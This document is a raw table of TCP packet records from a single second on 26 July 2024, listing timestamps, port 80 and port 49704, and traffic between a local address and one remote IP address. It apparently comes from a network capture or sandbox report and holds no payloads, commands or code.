Jul 26, 2024 20:09:10.528609037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528611898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528623104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528634071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528640032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528654099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528655052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528669119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528681040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528682947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.528707027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.528723955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529498100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529514074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529526949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529542923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529551029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529557943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529572964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529577971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529587984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529593945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529599905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529613972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529618025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529628992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529643059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.529649973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529671907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.529696941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530484915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530500889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530514002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530529976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530536890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530544043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530556917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530560017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530575037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530575991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530591011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530605078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530603886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530621052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.530627966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530647993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.530669928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531336069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531352043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531368017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531383991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531385899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531399012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531405926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531420946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531466007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531934977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531950951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531966925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531970978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531982899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.531991959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.531996965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532011032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532013893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532028913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532032013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532044888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532052040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532052040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532059908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532075882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532078981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532099009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532099009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532120943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532893896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532910109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532923937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532929897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532938957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532951117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532953978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532969952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.532970905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.532989979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533005953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533025980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533088923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533128023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533888102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533904076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533919096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533931017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533934116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533953905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533965111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533979893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533979893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.533981085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.533996105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534006119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534013033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534024954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534028053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534044981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534059048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534075975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534825087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534842014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534857035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534864902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534873009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534885883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534888029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534904003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534905910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534919024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534924984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534934044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534940958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534949064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534960032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534964085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.534986019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.534986019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535015106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535789967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535805941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535820007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535835028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535840034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535849094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535860062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535866022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535878897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535881042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535897017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535904884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535909891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535924911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.535929918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535948992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.535976887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536696911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536720991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536735058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536750078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536753893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536765099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536775112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536781073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536789894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536798000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536809921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536813974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536828995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536835909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536844015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.536850929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536880016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.536902905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537583113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537599087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537612915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537628889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537633896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537650108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537650108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537666082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537676096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537679911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537695885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537697077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537710905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537725925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537730932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537741899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.537750006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537774086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.537796974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538530111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538546085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538561106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538575888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538578033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538590908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538599014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538599014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538605928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538619995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538636923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538652897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538656950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538666964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538672924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538687944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.538692951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538707972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.538723946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539412022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539433956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539449930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539455891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539464951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539479971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539484978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539494991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539500952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539510012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539520979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539525986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539541006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539546967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539561987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539591074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539604902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539619923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.539659977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.539674997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540321112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540338039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540352106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540368080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540373087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540383101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540399075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540410042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540410042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540414095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540436983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540451050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540476084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.540970087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540986061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.540999889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541008949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541016102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541030884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541033983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541047096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541053057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541060925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541069031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541075945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541088104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541090012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541109085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541115046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541115046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541125059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541148901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541167021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.541910887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541928053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541941881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541956902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541973114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.541987896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542006016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542012930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542012930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542021990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542036057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542051077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542064905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542071104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542071104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542092085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542109966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542932034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542957067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542975903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.542980909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.542992115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543009996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543021917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543021917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543025970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543042898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543047905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543059111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543067932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543076038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543093920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543102026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543108940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543122053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543145895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543683052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543699980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543715000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543728113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543732882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543749094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543757915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543765068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543781042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543785095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543797970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543803930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543813944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543824911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543829918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543845892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543855906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543862104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.543874979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.543904066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544548988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544575930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544590950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544606924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544619083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544622898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544636965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544663906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544850111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544866085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544881105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544897079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544897079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544929981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544960022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.544970036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.544986010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545001984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545017004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545017958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545032978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545032978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.545049906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.545064926 CEST	80	49704	85.28.47.31	192.168.2.5
